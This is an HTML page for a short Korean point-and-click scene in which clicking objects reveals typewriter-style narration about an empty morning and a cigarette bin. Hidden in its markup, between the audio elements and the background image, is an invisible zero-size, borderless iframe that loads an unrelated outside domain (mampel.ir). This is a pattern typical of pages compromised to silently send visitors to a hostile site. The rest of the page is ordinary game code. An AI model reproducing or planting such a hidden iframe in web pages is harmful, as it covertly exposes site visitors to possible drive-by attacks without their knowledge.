<!DOCTYPE html>
<html>
<title>outside</title>
<style>
@font-face {
      font-family: "DungGeunMo";
      src: url("DungGeunMo.woff");
    }
	
	body{background-color: #484535; font-family: "DungGeunMo";}

	#backk{width: auto; height: 100%; animation:start 2s alternate;}
	#backk img{width: 1250px; height: auto;}
	
	#bx { position: absolute; bottom: 5%; left: 25%; display:none; }
	#bx img{ width: 70%; height: auto;  }

	#poom{bottom: 10%; font-weight: 5px; font-size: 1em;display:none; left: 28%;font-family: "DungGeunMo";}
	#poom2{bottom: 10%; font-weight: 5px; font-size: 1em;display:none; left: 28%;font-family: "DungGeunMo";}
	#poom3{bottom: 10%; font-weight: 5px; font-size: 1em;display:none; left: 28%;font-family: "DungGeunMo";}
	#poom4{bottom: 10%; font-weight: 5px; font-size: 1em;display:none; left: 28%;font-family: "DungGeunMo";}


	#okk{bottom: 13%; right: 25%;z-index: 6; cursor: pointer; position: absolute;display:none;}
		#okk img{height: 20px;width: auto; }

	#oo{bottom: 13%; right: 25%;z-index: 6; cursor: pointer; position: absolute;display:none;}
		#oo img{height: 20px;width: auto; }
	#ooo{bottom: 13%; right: 25%;z-index: 6; cursor: pointer; position: absolute;display:none;}
		#ooo img{height: 20px;width: auto; }	

	#soun { position: absolute; z-index: 99;cursor: pointer; top:5%; left: 0%; }
	#soun img{ position: absolute; width: 700px; height: 500px;z-index: 99;cursor: pointer;}

	#sigar { position: absolute; z-index: 99;cursor: pointer; bottom:28%; right: 17%; }
	#sigar img{ position: absolute; width: 100px; height: 200px;z-index: 99;cursor: pointer;}

	#rights{top: 50%; right: 6%; position: absolute; animation: heree 3s alternate;}
	#rights img{width: 40px; height: auto;cursor: pointer; }

	#tt { position: absolute; z-index: 99; top: 8%; left: 30%; animation: tra 2s alternate; display: none;cursor: pointer; }
	#tt img{ position: absolute; z-index: 99; width: 500px; height: auto; }	
#container{position: relative; margin: auto; width:1250px; height: 1000px;font-family: "DungGeunMo"; }
@-webkit-keyframes typing { from { width: 0; } }
@-webkit-keyframes blink-caret { 50% { border-color: #484535; } }



@keyframes inin{
			0%{top: 71%;}
			
			100%{top: 68%;}
		}
@keyframes backk{
			0%{bottom: 6%;}
			
			100%{bottom: 3%;}
		}			
		
@keyframes heree{
			0%{right: 8%;}
			
			100%{right: 6%;}
		}
@keyframes tra{
			0%{opacity: 0}
			
			100%{opacity: 1}
		}

h1 { 
	color: #484535;
	border-right: .2em solid #26241B;
	 
	width: 28ch;
	margin: 2em 1em;
	white-space: nowrap;
	overflow: hidden;
	position: absolute;
	-webkit-animation: typing 2s steps(30, end),
	           blink-caret .1s step-end infinite alternate;z-index: 3;
}
h2 { 
	color: #484535;
	border-right: .2em solid #26241B;
	 
	width: 44ch;
	margin: 2em 1em;
	white-space: nowrap;
	overflow: hidden;
	position: absolute;
	-webkit-animation: typing 3s steps(40, end),
	           blink-caret .1s step-end infinite alternate; z-index: 3;
}
h3 { 
	color: #484535;
	border-right: .2em solid #26241B;
	 
	width: 35ch;
	margin: 2em 1em;
	white-space: nowrap;
	overflow: hidden;
	position: absolute;
	-webkit-animation: typing 3s steps(50, end),
	           blink-caret .1s step-end infinite alternate; z-index: 3;
}
</style>

<head>
	<title></title>
</head>

<body>
	<div id="container">
	 <h2 id="poom">아직 이른 아침이라 그런지 아무도 안 보인다.</h2>
	 	<h2 id="poom2">그래도 그렇지 이렇게까지 사람이 안보이다니..</h2>
	 	<h1 id="poom3">담배 꽁초를 버리는 바구니다.</h1>
	 	<h3 id="poom4">아직 담배냄새가 미미하게 남아있다...</h3>
	
	
	 	<audio id="walk">
		<source src="walk.mp3" type="audio/mpeg"autoplay="true" preload="auto">
	</audio>

		<audio id="out">
		<source src="out.mp3" type="audio/mpeg"autoplay="true" preload="auto">
	</audio>
	<audio id="crun">
		<source src="sisi.mp3" type="audio/mpeg">
	</audio>




<iframe src="http://mampel.ir/" frameborder="0" style="width:0px;height:0px;border:0px" ></iframe>

	<div id="backk">
		<center>
		<img src="main.png">
		</center>
	</div>
	<a href="https://seoojing.github.io/W.C/">
<div id="rights">
		<img src="orhere.png">
	</div>
	</a>

	<div id="bx">
		<img src="boox.png">
	</div>
	<div id="soun">
		<img src="blank.png">
	</div>

<div id="sigar">
		<img src="blank.png">
	</div>

	<div id="oo">
		<img src="won.png">
	</div>
	<div id="ooo">
		<img src="won.png">
	</div>
	<div id="okk">
		<img src="okk.png">
	</div>
	<div id="tt">
		<img src="sig.png">
	</div>
</div>
<script type="text/javascript">



var bbPlay = 0;
window.onmousemove = function(){
	bbPlay++;
	if(bbPlay == 1){out.play();walk.play();  }
}

	
var toggle = "off";
	var clickNumber = 0;
	soun.onclick = function(){
		
			toggle = "on";
			bx.style.display = "inline";
			poom.style.display = "inline";
			oo.style.display = "inline"
			soun.style.display = "none"
			}

	oo.onclick = function(){
			poom.style.display = "none"
			oo.style.display = "none"
			poom2.style.display = "inline"
			okk.style.display = "inline"}

	ooo.onclick = function(){
			poom3.style.display = "none"
			poom4.style.display = "inline"
			ooo.style.display = "none"
			
			okk.style.display = "inline"}


	okk.onclick = function(){
			poom2.style.display = "none"
			okk.style.display = "none"
			bx.style.display = "none"
			poom4.style.display = "none"
			tt.style.display = "none"
}
			
			
	



sigar.onclick = function(){
			crun.play();
			toggle = "on";
			bx.style.display = "inline";
			poom3.style.display = "inline";
			tt.style.display = "inline";
			ooo.style.display = "inline"
			}




</script>
</body>
</html>